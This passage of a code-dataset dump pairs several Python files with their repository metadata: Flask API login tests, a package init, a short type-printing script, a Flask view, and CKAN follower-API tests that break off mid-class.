[
"MIT"
] | 1
|
2018-10-18T12:40:19.000Z
|
2018-10-18T12:40:19.000Z
|
test/v1/test_users.py
|
SelaDanti/store-manager-api
|
3d3a26ebf961ddb2c97f0d31c48ae07b43201b4f
|
[
"MIT"
] | 5
|
2018-10-23T11:08:56.000Z
|
2019-10-21T15:58:54.000Z
|
test/v1/test_users.py
|
SelaDanti/store-manager-api
|
3d3a26ebf961ddb2c97f0d31c48ae07b43201b4f
|
[
"MIT"
] | 1
|
2018-10-18T13:37:35.000Z
|
2018-10-18T13:37:35.000Z
|
import unittest
import json
from app import create_app
class TestInvalidData(unittest.TestCase):
    """Login endpoint rejections for malformed or unknown credentials."""

    def setUp(self):
        # Fresh test client per test, talking JSON to the API.
        self.test = create_app('testing').test_client()
        self.content_type = 'application/json'

    def tearDown(self):
        self.test = None
        self.content_type = None

    def _login(self, payload):
        """POST *payload* to the login endpoint; return (response, decoded body)."""
        response = self.test.post('/api/v1/users/login',
                                  content_type=self.content_type,
                                  data=json.dumps(payload))
        data = json.loads(response.get_data().decode('UTF-8'))
        return response, data

    def test_not_emailI(self):
        """A malformed email address is rejected with 406."""
        payload = {'role': 'admin', 'password': '1234', 'email': 'stringgmail.com'}
        response, data = self._login(payload)
        self.assertEqual(response.status_code, 406)
        self.assertEqual(data, {'result': 'invalid email'})

    def test_not_role(self):
        """An unknown role is rejected with 406."""
        payload = {'role': 'not role', 'password': '1234', 'email': 'string@gmail.com'}
        response, data = self._login(payload)
        self.assertEqual(response.status_code, 406)
        self.assertEqual(data, {'result': 'invalid role'})

    def test_invalid_login(self):
        """Wrong credentials are rejected with 406."""
        payload = {'role': 'admin', 'password': 'notpassword', 'email': 'not@gmail.com'}
        response, data = self._login(payload)
        self.assertEqual(response.status_code, 406)
        self.assertEqual(data, {'result': 'email or password invalid'})
class TestValidData(unittest.TestCase):
    """Happy-path login and registration using the seeded admin account."""

    def setUp(self):
        self.test = create_app('testing').test_client()
        self.content_type = 'application/json'
        # Log in once as admin and keep the returned token for auth'd requests.
        payload = {'role': 'admin', 'password': '1234', 'email': 'admin@gmail.com'}
        _, data = self._post('/api/v1/users/login', payload)
        token = data['result']
        self.headers = {'X-API-KEY': '{}'.format(token)}

    def tearDown(self):
        self.test = None
        self.content_type = None

    def _post(self, url, payload, headers=None):
        """POST *payload* as JSON to *url*; return (response, decoded body)."""
        kwargs = {'content_type': self.content_type, 'data': json.dumps(payload)}
        if headers is not None:
            kwargs['headers'] = headers
        response = self.test.post(url, **kwargs)
        data = json.loads(response.get_data().decode('UTF-8'))
        return response, data

    def test_login(self):
        """Valid admin credentials yield a 200 response."""
        payload = {'role': 'admin', 'password': '1234', 'email': 'admin@gmail.com'}
        response, _ = self._post('/api/v1/users/login', payload)
        self.assertEqual(response.status_code, 200)

    def test_register_employee(self):
        """An authenticated admin can register a new employee."""
        payload = {'role': 'admin', 'last_name': 'string', 'password': '1234',
                   'email': 'string@gmail.com', 'first_name': 'string'}
        response, _ = self._post('/api/v1/users/register', payload,
                                 headers=self.headers)
        self.assertEqual(response.status_code, 200)
# Allow running this test module directly with the Python interpreter.
if __name__ == '__main__':
    unittest.main()
| 37.666667
| 101
| 0.712021
| 375
| 2,712
| 5.013333
| 0.178667
| 0.093617
| 0.079787
| 0.06383
| 0.804255
| 0.804255
| 0.755319
| 0.717553
| 0.717553
| 0.693085
| 0
| 0.019365
| 0.105089
| 2,712
| 72
| 102
| 37.666667
| 0.755253
| 0
| 0
| 0.59322
| 0
| 0
| 0.211205
| 0.008109
| 0
| 0
| 0
| 0
| 0.135593
| 1
| 0.152542
| false
| 0.118644
| 0.050847
| 0
| 0.237288
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
90a943a8f323d5690c9e80436b17fac13104d0c4
| 330
|
py
|
Python
|
knowit/rules/__init__.py
|
ratoaq2/knowit
|
e7cc0d786fafdb9dba99b95a1cc95c02f84f0b5b
|
[
"MIT"
] | 21
|
2016-10-15T13:49:16.000Z
|
2021-06-14T14:42:57.000Z
|
knowit/rules/__init__.py
|
ratoaq2/knowit
|
e7cc0d786fafdb9dba99b95a1cc95c02f84f0b5b
|
[
"MIT"
] | 35
|
2016-11-18T17:08:38.000Z
|
2021-11-26T09:36:35.000Z
|
knowit/rules/__init__.py
|
ratoaq2/knowit
|
e7cc0d786fafdb9dba99b95a1cc95c02f84f0b5b
|
[
"MIT"
] | 5
|
2016-11-23T23:39:52.000Z
|
2021-02-27T19:18:27.000Z
|
from knowit.rules.audio import AtmosRule
from knowit.rules.audio import AudioChannelsRule
from knowit.rules.audio import DtsHdRule
from knowit.rules.general import LanguageRule
from knowit.rules.subtitle import ClosedCaptionRule
from knowit.rules.subtitle import HearingImpairedRule
from knowit.rules.video import ResolutionRule
| 36.666667
| 53
| 0.869697
| 42
| 330
| 6.833333
| 0.357143
| 0.243902
| 0.365854
| 0.209059
| 0.473868
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.087879
| 330
| 8
| 54
| 41.25
| 0.953488
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
90b232963c4041540fbe309af85a587634a392a0
| 135
|
py
|
Python
|
zero/what_is_oop.py
|
magicalcarpet/the_complete_python_course
|
0ac0c5015a93607d7d29258ac0a3fc38dda81bd2
|
[
"MIT"
] | null | null | null |
zero/what_is_oop.py
|
magicalcarpet/the_complete_python_course
|
0ac0c5015a93607d7d29258ac0a3fc38dda81bd2
|
[
"MIT"
] | null | null | null |
zero/what_is_oop.py
|
magicalcarpet/the_complete_python_course
|
0ac0c5015a93607d7d29258ac0a3fc38dda81bd2
|
[
"MIT"
] | null | null | null |
# Print the built-in type of one representative value of each core kind:
# the NoneType singleton, a bool, an int, a float, a str, and the empty
# list / tuple / dict literals.
for sample in (None, True, 5, 5.5, 'hi', [], (), {}):
    print(type(sample))
| 16.875
| 19
| 0.62963
| 22
| 135
| 3.863636
| 0.272727
| 0.847059
| 0.235294
| 0.423529
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.023438
| 0.051852
| 135
| 8
| 20
| 16.875
| 0.640625
| 0
| 0
| 0
| 0
| 0
| 0.014706
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
90b7b6dac2ac0e3ec63808875956c62c12b09e2e
| 187
|
py
|
Python
|
zip/app/views.py
|
kdheepak/zip
|
5c7f2400045d6ae2b3b4994577c73209562604a9
|
[
"BSD-3-Clause"
] | null | null | null |
zip/app/views.py
|
kdheepak/zip
|
5c7f2400045d6ae2b3b4994577c73209562604a9
|
[
"BSD-3-Clause"
] | 2
|
2018-08-14T20:52:43.000Z
|
2020-11-18T11:26:48.000Z
|
zip/app/views.py
|
kdheepak/zip
|
5c7f2400045d6ae2b3b4994577c73209562604a9
|
[
"BSD-3-Clause"
] | 2
|
2018-04-17T08:39:23.000Z
|
2019-02-05T07:43:00.000Z
|
# -*- encoding: utf-8 -*-
from flask import url_for, redirect, render_template, flash, g, session
from app import app
@app.route('/')
def index():
    """Render the site landing page (index.html) for the root URL."""
    return render_template('index.html')
| 20.777778
| 71
| 0.705882
| 27
| 187
| 4.777778
| 0.740741
| 0.217054
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.006211
| 0.139037
| 187
| 8
| 72
| 23.375
| 0.795031
| 0.122995
| 0
| 0
| 0
| 0
| 0.067901
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.2
| true
| 0
| 0.4
| 0.2
| 0.8
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
90bc4a23101028d1eba113429d147698ebdc7c6d
| 43,903
|
py
|
Python
|
ckan/tests/functional/api/test_follow.py
|
gcba/ckan
|
f4508f2999d5f69281ac8003ba7f42df5930b6fd
|
[
"Apache-2.0"
] | null | null | null |
ckan/tests/functional/api/test_follow.py
|
gcba/ckan
|
f4508f2999d5f69281ac8003ba7f42df5930b6fd
|
[
"Apache-2.0"
] | null | null | null |
ckan/tests/functional/api/test_follow.py
|
gcba/ckan
|
f4508f2999d5f69281ac8003ba7f42df5930b6fd
|
[
"Apache-2.0"
] | 1
|
2020-10-30T02:19:02.000Z
|
2020-10-30T02:19:02.000Z
|
'''Tests for the follower API.
This module tests following, unfollowing, getting a list of what you're
following or the number of things you're following, getting a list of who's
following you or the number of followers you have, testing whether or not
you're following something, etc.
This module _does not_ test the user dashboard activity stream (which shows
activities from everything you're following), that is tested in
test_dashboard.py.
'''
import datetime
import paste
import pylons.test
import ckan
from ckan.tests import are_foreign_keys_supported, SkipTest
import ckan.tests
def datetime_from_string(s):
    '''Parse *s* into a standard datetime.datetime object.

    The accepted format is the one used for timestamps in dictized
    activities, i.e. what datetime.datetime.isoformat() produces.
    '''
    timestamp_format = '%Y-%m-%dT%H:%M:%S.%f'
    return datetime.datetime.strptime(s, timestamp_format)
def follow_user(app, follower_id, apikey, object_id, object_arg):
    '''Test a user starting to follow another user via the API.

    Asserts that the follow succeeds and that all follower/followee
    counts and lists are updated consistently.

    :param follower_id: id of the user that will be following something.
    :param apikey: API key of the user that will be following something.
    :param object_id: id of the user that will be followed.
    :param object_arg: the argument to pass to follow_user as the id of
        the object that will be followed, could be the object's id or name.
    '''
    # NOTE(review): ckan.tests.call_action_api presumably posts to the
    # action API and returns the decoded result — verify against
    # ckan.tests if behavior changes.
    # Record the object's followers count before.
    follower_count_before = ckan.tests.call_action_api(app,
            'user_follower_count', id=object_id)
    # Record the follower's followees count before.
    followee_count_before = ckan.tests.call_action_api(app,
            'user_followee_count', id=follower_id)
    # Check that the user is not already following the object.
    result = ckan.tests.call_action_api(app, 'am_following_user',
            id=object_id, apikey=apikey)
    assert result is False
    # Make the user start following the object.
    before = datetime.datetime.now()
    follower = ckan.tests.call_action_api(app, 'follow_user', id=object_arg,
            apikey=apikey)
    after = datetime.datetime.now()
    assert follower['follower_id'] == follower_id
    assert follower['object_id'] == object_id
    # The recorded follow timestamp must fall inside the before/after window.
    timestamp = datetime_from_string(follower['datetime'])
    assert (timestamp >= before and timestamp <= after), str(timestamp)
    # Check that am_following_user now returns True.
    result = ckan.tests.call_action_api(app, 'am_following_user',
            id=object_id, apikey=apikey)
    assert result is True
    # Check that the follower appears in the object's list of followers.
    followers = ckan.tests.call_action_api(app, 'user_follower_list',
            id=object_id)
    assert len(followers) == follower_count_before + 1
    assert len([follower for follower in followers if follower['id'] == follower_id]) == 1
    # Check that the object appears in the follower's list of followees.
    followees = ckan.tests.call_action_api(app, 'user_followee_list',
            id=follower_id)
    assert len(followees) == followee_count_before + 1
    assert len([followee for followee in followees if followee['id'] == object_id]) == 1
    # Check that the object's follower count has increased by 1.
    follower_count_after = ckan.tests.call_action_api(app,
            'user_follower_count', id=object_id)
    assert follower_count_after == follower_count_before + 1
    # Check that the follower's followee count has increased by 1.
    followee_count_after = ckan.tests.call_action_api(app,
            'user_followee_count', id=follower_id)
    assert followee_count_after == followee_count_before + 1
def follow_dataset(app, follower_id, apikey, dataset_id, dataset_arg):
    '''Test a user starting to follow a dataset via the API.

    Asserts that the follow succeeds and that all follower/followee
    counts and lists are updated consistently.

    :param follower_id: id of the user.
    :param apikey: API key of the user.
    :param dataset_id: id of the dataset.
    :param dataset_arg: the argument to pass to follow_dataset as the id of
        the dataset that will be followed, could be the dataset's id or name.
    '''
    # Record the dataset's followers count before.
    follower_count_before = ckan.tests.call_action_api(app,
            'dataset_follower_count', id=dataset_id)
    # Record the follower's followees count before.
    followee_count_before = ckan.tests.call_action_api(app,
            'dataset_followee_count', id=follower_id)
    # Check that the user is not already following the dataset.
    result = ckan.tests.call_action_api(app, 'am_following_dataset',
            id=dataset_id, apikey=apikey)
    assert result is False
    # Make the user start following the dataset.
    before = datetime.datetime.now()
    follower = ckan.tests.call_action_api(app, 'follow_dataset',
            id=dataset_arg, apikey=apikey)
    after = datetime.datetime.now()
    assert follower['follower_id'] == follower_id
    assert follower['object_id'] == dataset_id
    # The recorded follow timestamp must fall inside the before/after window.
    timestamp = datetime_from_string(follower['datetime'])
    assert (timestamp >= before and timestamp <= after), str(timestamp)
    # Check that am_following_dataset now returns True.
    result = ckan.tests.call_action_api(app, 'am_following_dataset',
            id=dataset_id, apikey=apikey)
    assert result is True
    # Check that the follower appears in the dataset's list of followers.
    followers = ckan.tests.call_action_api(app, 'dataset_follower_list',
            id=dataset_id)
    assert len(followers) == follower_count_before + 1
    assert len([follower for follower in followers if follower['id'] == follower_id]) == 1
    # Check that the dataset appears in the follower's list of followees.
    followees = ckan.tests.call_action_api(app, 'dataset_followee_list',
            id=follower_id)
    assert len(followees) == followee_count_before + 1
    assert len([followee for followee in followees if followee['id'] == dataset_id]) == 1
    # Check that the dataset's follower count has increased by 1.
    follower_count_after = ckan.tests.call_action_api(app,
            'dataset_follower_count', id=dataset_id)
    assert follower_count_after == follower_count_before + 1
    # Check that the follower's followee count has increased by 1.
    followee_count_after = ckan.tests.call_action_api(app,
            'dataset_followee_count', id=follower_id)
    assert followee_count_after == followee_count_before + 1
def follow_group(app, user_id, apikey, group_id, group_arg):
    '''Test a user starting to follow a group via the API.

    Asserts that the follow succeeds and that all follower/followee
    counts and lists are updated consistently.

    :param user_id: id of the user
    :param apikey: API key of the user
    :param group_id: id of the group
    :param group_arg: the argument to pass to follow_group as the id of
        the group that will be followed, could be the group's id or name
    '''
    # Record the group's followers count before.
    follower_count_before = ckan.tests.call_action_api(app,
            'group_follower_count', id=group_id)
    # Record the user's followees count before.
    followee_count_before = ckan.tests.call_action_api(app,
            'group_followee_count', id=user_id)
    # Check that the user is not already following the group.
    result = ckan.tests.call_action_api(app, 'am_following_group',
            id=group_id, apikey=apikey)
    assert result is False
    # Make the user start following the group.
    before = datetime.datetime.now()
    # FIX: pass group_arg (id *or* name) rather than group_id, matching
    # follow_user/follow_dataset — previously group_arg was ignored, so
    # "follow group by name" tests silently re-tested follow-by-id.
    follower = ckan.tests.call_action_api(app, 'follow_group', id=group_arg,
            apikey=apikey)
    after = datetime.datetime.now()
    assert follower['follower_id'] == user_id
    assert follower['object_id'] == group_id
    # The recorded follow timestamp must fall inside the before/after window.
    timestamp = datetime_from_string(follower['datetime'])
    assert (timestamp >= before and timestamp <= after), str(timestamp)
    # Check that am_following_group now returns True.
    result = ckan.tests.call_action_api(app, 'am_following_group',
            id=group_id, apikey=apikey)
    assert result is True
    # Check that the user appears in the group's list of followers.
    followers = ckan.tests.call_action_api(app, 'group_follower_list',
            id=group_id)
    assert len(followers) == follower_count_before + 1
    assert len([follower for follower in followers
            if follower['id'] == user_id]) == 1
    # Check that the group appears in the user's list of followees.
    followees = ckan.tests.call_action_api(app, 'group_followee_list',
            id=user_id)
    assert len(followees) == followee_count_before + 1
    assert len([followee for followee in followees
            if followee['id'] == group_id]) == 1
    # Check that the group's follower count has increased by 1.
    follower_count_after = ckan.tests.call_action_api(app,
            'group_follower_count', id=group_id)
    assert follower_count_after == follower_count_before + 1
    # Check that the user's followee count has increased by 1.
    followee_count_after = ckan.tests.call_action_api(app,
            'group_followee_count', id=user_id)
    assert followee_count_after == followee_count_before + 1
class TestFollow(object):
    '''Tests for the follower API.

    Fixtures (users, packages, groups) come from CKAN's standard
    CreateTestData set; tests are ordered by their test_NN prefix so the
    follow relations created in test_02 exist for test_03/test_04.
    '''

    # NOTE(review): classmethod first arg is conventionally named `cls`,
    # not `self` — kept as-is here to avoid a code change.
    @classmethod
    def setup_class(self):
        ckan.tests.CreateTestData.create()
        # Reduce each fixture to the id/apikey/name fields the tests use.
        self.testsysadmin = {
            'id': ckan.model.User.get('testsysadmin').id,
            'apikey': ckan.model.User.get('testsysadmin').apikey,
            'name': ckan.model.User.get('testsysadmin').name,
        }
        self.annafan = {
            'id': ckan.model.User.get('annafan').id,
            'apikey': ckan.model.User.get('annafan').apikey,
            'name': ckan.model.User.get('annafan').name,
        }
        self.russianfan = {
            'id': ckan.model.User.get('russianfan').id,
            'apikey': ckan.model.User.get('russianfan').apikey,
            'name': ckan.model.User.get('russianfan').name,
        }
        self.joeadmin = {
            'id': ckan.model.User.get('joeadmin').id,
            'apikey': ckan.model.User.get('joeadmin').apikey,
            'name': ckan.model.User.get('joeadmin').name,
        }
        self.warandpeace = {
            'id': ckan.model.Package.get('warandpeace').id,
            'name': ckan.model.Package.get('warandpeace').name,
        }
        self.annakarenina = {
            'id': ckan.model.Package.get('annakarenina').id,
            'name': ckan.model.Package.get('annakarenina').name,
        }
        self.rogers_group = {
            'id': ckan.model.Group.get('roger').id,
            'name': ckan.model.Group.get('roger').name,
        }
        self.davids_group = {
            'id': ckan.model.Group.get('david').id,
            'name': ckan.model.Group.get('david').name,
        }
        self.app = paste.fixture.TestApp(pylons.test.pylonsapp)

    @classmethod
    def teardown_class(self):
        '''Drop and rebuild the test database.'''
        ckan.model.repo.rebuild_db()

    # --- test_01_*: authentication / validation errors -------------------

    def test_01_user_follow_user_bad_apikey(self):
        for apikey in ('bad api key', '', ' ', 'None', '3', '35.7', 'xxx'):
            error = ckan.tests.call_action_api(self.app, 'follow_user',
                    id=self.russianfan['id'], apikey=apikey,
                    status=403)
            assert error['message'] == 'Access denied'

    def test_01_user_follow_dataset_bad_apikey(self):
        for apikey in ('bad api key', '', ' ', 'None', '3', '35.7', 'xxx'):
            error = ckan.tests.call_action_api(self.app, 'follow_dataset',
                    id=self.warandpeace['id'], apikey=apikey,
                    status=403)
            assert error['message'] == 'Access denied'

    def test_01_user_follow_group_bad_apikey(self):
        for apikey in ('bad api key', '', ' ', 'None', '3', '35.7', 'xxx'):
            error = ckan.tests.call_action_api(self.app, 'follow_group',
                    id=self.rogers_group['id'], apikey=apikey,
                    status=403)
            assert error['message'] == 'Access denied'

    def test_01_user_follow_user_missing_apikey(self):
        error = ckan.tests.call_action_api(self.app, 'follow_user',
                id=self.russianfan['id'], status=403)
        assert error['message'] == 'Access denied'

    def test_01_user_follow_dataset_missing_apikey(self):
        error = ckan.tests.call_action_api(self.app, 'follow_dataset',
                id=self.warandpeace['id'], status=403)
        assert error['message'] == 'Access denied'

    def test_01_user_follow_group_missing_apikey(self):
        error = ckan.tests.call_action_api(self.app, 'follow_group',
                id=self.rogers_group['id'], status=403)
        assert error['message'] == 'Access denied'

    def test_01_follow_bad_object_id(self):
        for action in ('follow_user', 'follow_dataset', 'follow_group'):
            for object_id in ('bad id', ' ', 3, 35.7, 'xxx'):
                error = ckan.tests.call_action_api(self.app, action,
                        id=object_id,
                        apikey=self.annafan['apikey'], status=409)
                assert error['id'][0].startswith('Not found')

    def test_01_follow_empty_object_id(self):
        for action in ('follow_user', 'follow_dataset', 'follow_group'):
            for object_id in ('', None):
                error = ckan.tests.call_action_api(self.app, action,
                        id=object_id,
                        apikey=self.annafan['apikey'], status=409)
                assert error['id'] == ['Missing value']

    def test_01_follow_missing_object_id(self):
        for action in ('follow_user', 'follow_dataset', 'follow_group'):
            error = ckan.tests.call_action_api(self.app, action,
                    apikey=self.annafan['apikey'], status=409)
            assert error['id'] == ['Missing value']

    # --- test_02_*: successful follows (by id and by name) ---------------

    def test_02_user_follow_user_by_id(self):
        follow_user(self.app, self.annafan['id'], self.annafan['apikey'],
                self.russianfan['id'], self.russianfan['id'])

    def test_02_user_follow_dataset_by_id(self):
        follow_dataset(self.app, self.annafan['id'], self.annafan['apikey'],
                self.warandpeace['id'], self.warandpeace['id'])

    def test_02_user_follow_group_by_id(self):
        follow_group(self.app, self.annafan['id'], self.annafan['apikey'],
                self.rogers_group['id'], self.rogers_group['id'])

    def test_02_user_follow_user_by_name(self):
        follow_user(self.app, self.annafan['id'], self.annafan['apikey'],
                self.testsysadmin['id'], self.testsysadmin['name'])

    def test_02_user_follow_dataset_by_name(self):
        follow_dataset(self.app, self.joeadmin['id'], self.joeadmin['apikey'],
                self.warandpeace['id'], self.warandpeace['name'])

    def test_02_user_follow_group_by_name(self):
        follow_group(self.app, self.joeadmin['id'], self.joeadmin['apikey'],
                self.rogers_group['id'], self.rogers_group['name'])

    # --- test_03_*: duplicate / self follows are rejected ----------------

    def test_03_user_follow_user_already_following(self):
        for object_id in (self.russianfan['id'], self.russianfan['name'],
                self.testsysadmin['id'], self.testsysadmin['name']):
            error = ckan.tests.call_action_api(self.app, 'follow_user',
                    id=object_id, apikey=self.annafan['apikey'],
                    status=409)
            assert error['message'].startswith('You are already following ')

    def test_03_user_follow_dataset_already_following(self):
        for object_id in (self.warandpeace['id'], self.warandpeace['name']):
            error = ckan.tests.call_action_api(self.app, 'follow_dataset',
                    id=object_id, apikey=self.annafan['apikey'],
                    status=409)
            assert error['message'].startswith('You are already following ')

    def test_03_user_follow_group_already_following(self):
        for group_id in (self.rogers_group['id'], self.rogers_group['name']):
            error = ckan.tests.call_action_api(self.app, 'follow_group',
                    id=group_id, apikey=self.annafan['apikey'],
                    status=409)
            assert error['message'].startswith('You are already following ')

    def test_03_user_cannot_follow_herself(self):
        error = ckan.tests.call_action_api(self.app, 'follow_user',
                apikey=self.annafan['apikey'], status=409,
                id=self.annafan['id'])
        assert error['message'] == 'You cannot follow yourself'

    # --- test_04_*: counts, lists and am_following_* queries -------------

    def test_04_follower_count_bad_id(self):
        for action in ('user_follower_count', 'dataset_follower_count',
                'group_follower_count'):
            for object_id in ('bad id', ' ', 3, 35.7, 'xxx', ''):
                error = ckan.tests.call_action_api(self.app, action,
                        status=409, id=object_id)
                assert 'id' in error

    def test_04_follower_count_missing_id(self):
        for action in ('user_follower_count', 'dataset_follower_count',
                'group_follower_count'):
            error = ckan.tests.call_action_api(self.app, action, status=409)
            assert error['id'] == ['Missing value']

    def test_04_user_follower_count_no_followers(self):
        follower_count = ckan.tests.call_action_api(self.app,
                'user_follower_count', id=self.annafan['id'])
        assert follower_count == 0

    def test_04_dataset_follower_count_no_followers(self):
        follower_count = ckan.tests.call_action_api(self.app,
                'dataset_follower_count', id=self.annakarenina['id'])
        assert follower_count == 0

    def test_04_group_follower_count_no_followers(self):
        follower_count = ckan.tests.call_action_api(self.app,
                'group_follower_count', id=self.davids_group['id'])
        assert follower_count == 0

    def test_04_follower_list_bad_id(self):
        for action in ('user_follower_list', 'dataset_follower_list',
                'group_follower_list'):
            for object_id in ('bad id', ' ', 3, 35.7, 'xxx', ''):
                error = ckan.tests.call_action_api(self.app, action,
                        status=409, id=object_id)
                assert error['id']

    def test_04_follower_list_missing_id(self):
        for action in ('user_follower_list', 'dataset_follower_list',
                'group_follower_list'):
            error = ckan.tests.call_action_api(self.app, action, status=409)
            assert error['id'] == ['Missing value']

    def test_04_user_follower_list_no_followers(self):
        followers = ckan.tests.call_action_api(self.app, 'user_follower_list',
                id=self.annafan['id'])
        assert followers == []

    def test_04_dataset_follower_list_no_followers(self):
        followers = ckan.tests.call_action_api(self.app,
                'dataset_follower_list', id=self.annakarenina['id'])
        assert followers == []

    def test_04_group_follower_list_no_followers(self):
        followers = ckan.tests.call_action_api(self.app, 'group_follower_list',
                id=self.davids_group['id'])
        assert followers == []

    def test_04_am_following_bad_id(self):
        for action in ('am_following_dataset', 'am_following_user',
                'am_following_group'):
            for object_id in ('bad id', ' ', 3, 35.7, 'xxx'):
                error = ckan.tests.call_action_api(self.app, action,
                        apikey=self.annafan['apikey'], status=409, id=object_id)
                assert error['id'][0].startswith('Not found: ')

    def test_04_am_following_missing_id(self):
        for action in ('am_following_dataset', 'am_following_user',
                'am_following_group'):
            # 'missing' means omit the id parameter entirely, as opposed
            # to sending an empty/None value.
            for id in ('missing', None, ''):
                if id == 'missing':
                    error = ckan.tests.call_action_api(self.app, action,
                            apikey=self.annafan['apikey'], status=409)
                else:
                    error = ckan.tests.call_action_api(self.app, action,
                            apikey=self.annafan['apikey'], status=409, id=id)
                assert error['id'] == [u'Missing value']

    def test_04_am_following_dataset_bad_apikey(self):
        for apikey in ('bad api key', '', ' ', 'None', '3', '35.7', 'xxx'):
            error = ckan.tests.call_action_api(self.app,
                    'am_following_dataset', apikey=apikey, status=403,
                    id=self.warandpeace['id'])
            assert error['message'] == 'Access denied'

    def test_04_am_following_dataset_missing_apikey(self):
        error = ckan.tests.call_action_api(self.app, 'am_following_dataset',
                status=403, id=self.warandpeace['id'])
        assert error['message'] == 'Access denied'

    def test_04_am_following_user_bad_apikey(self):
        for apikey in ('bad api key', '', ' ', 'None', '3', '35.7', 'xxx'):
            error = ckan.tests.call_action_api(self.app, 'am_following_user',
                    apikey=apikey, status=403, id=self.annafan['id'])
            assert error['message'] == 'Access denied'

    def test_04_am_following_user_missing_apikey(self):
        error = ckan.tests.call_action_api(self.app, 'am_following_user',
                status=403, id=self.annafan['id'])
        assert error['message'] == 'Access denied'

    def test_04_am_following_group_bad_apikey(self):
        for apikey in ('bad api key', '', ' ', 'None', '3', '35.7', 'xxx'):
            error = ckan.tests.call_action_api(self.app, 'am_following_group',
                    apikey=apikey, status=403, id=self.rogers_group['id'])
            assert error['message'] == 'Access denied'

    def test_04_am_following_group_missing_apikey(self):
        error = ckan.tests.call_action_api(self.app, 'am_following_group',
                status=403, id=self.rogers_group['id'])
        assert error['message'] == 'Access denied'
class TestFollowerDelete(object):
    '''Tests for the unfollow_* APIs.

    setup_class creates a set of follow relations up-front so the
    unfollow tests have something to delete.
    '''

    # NOTE(review): classmethod first arg is conventionally named `cls`,
    # not `self` — kept as-is here to avoid a code change.
    @classmethod
    def setup_class(self):
        ckan.tests.CreateTestData.create()
        # Reduce each fixture to the id/apikey/name fields the tests use.
        self.tester = {
            'id': ckan.model.User.get('tester').id,
            'apikey': ckan.model.User.get('tester').apikey,
            'name': ckan.model.User.get('tester').name,
        }
        self.testsysadmin = {
            'id': ckan.model.User.get('testsysadmin').id,
            'apikey': ckan.model.User.get('testsysadmin').apikey,
            'name': ckan.model.User.get('testsysadmin').name,
        }
        self.annafan = {
            'id': ckan.model.User.get('annafan').id,
            'apikey': ckan.model.User.get('annafan').apikey,
            'name': ckan.model.User.get('annafan').name,
        }
        self.russianfan = {
            'id': ckan.model.User.get('russianfan').id,
            'apikey': ckan.model.User.get('russianfan').apikey,
            'name': ckan.model.User.get('russianfan').name,
        }
        self.joeadmin = {
            'id': ckan.model.User.get('joeadmin').id,
            'apikey': ckan.model.User.get('joeadmin').apikey,
            'name': ckan.model.User.get('joeadmin').name,
        }
        self.warandpeace = {
            'id': ckan.model.Package.get('warandpeace').id,
            'name': ckan.model.Package.get('warandpeace').name,
        }
        self.annakarenina = {
            'id': ckan.model.Package.get('annakarenina').id,
            'name': ckan.model.Package.get('annakarenina').name,
        }
        self.rogers_group = {
            'id': ckan.model.Group.get('roger').id,
            'name': ckan.model.Group.get('roger').name,
        }
        self.davids_group = {
            'id': ckan.model.Group.get('david').id,
            'name': ckan.model.Group.get('david').name,
        }
        self.app = paste.fixture.TestApp(pylons.test.pylonsapp)
        # Pre-create the follow relations that the unfollow tests delete.
        follow_user(self.app, self.testsysadmin['id'],
                self.testsysadmin['apikey'], self.joeadmin['id'],
                self.joeadmin['id'])
        follow_user(self.app, self.tester['id'], self.tester['apikey'],
                self.joeadmin['id'], self.joeadmin['id'])
        follow_user(self.app, self.russianfan['id'], self.russianfan['apikey'],
                self.joeadmin['id'], self.joeadmin['id'])
        follow_user(self.app, self.annafan['id'], self.annafan['apikey'],
                self.joeadmin['id'], self.joeadmin['id'])
        follow_user(self.app, self.annafan['id'], self.annafan['apikey'],
                self.tester['id'], self.tester['id'])
        follow_dataset(self.app, self.testsysadmin['id'],
                self.testsysadmin['apikey'], self.warandpeace['id'],
                self.warandpeace['id'])
        follow_dataset(self.app, self.tester['id'], self.tester['apikey'],
                self.warandpeace['id'], self.warandpeace['id'])
        follow_dataset(self.app, self.russianfan['id'], self.russianfan['apikey'],
                self.warandpeace['id'], self.warandpeace['id'])
        follow_dataset(self.app, self.annafan['id'], self.annafan['apikey'],
                self.warandpeace['id'], self.warandpeace['id'])
        follow_group(self.app, self.annafan['id'], self.annafan['apikey'],
                self.davids_group['id'], self.davids_group['id'])

    @classmethod
    def teardown_class(self):
        '''Drop and rebuild the test database.'''
        ckan.model.repo.rebuild_db()

    def test_01_unfollow_user_not_exists(self):
        '''Test the error response when a user tries to unfollow a user that
        she is not following.
        '''
        error = ckan.tests.call_action_api(self.app, 'unfollow_user',
                apikey=self.annafan['apikey'], status=404,
                id=self.russianfan['id'])
        assert error['message'].startswith('Not found: You are not following ')

    def test_01_unfollow_dataset_not_exists(self):
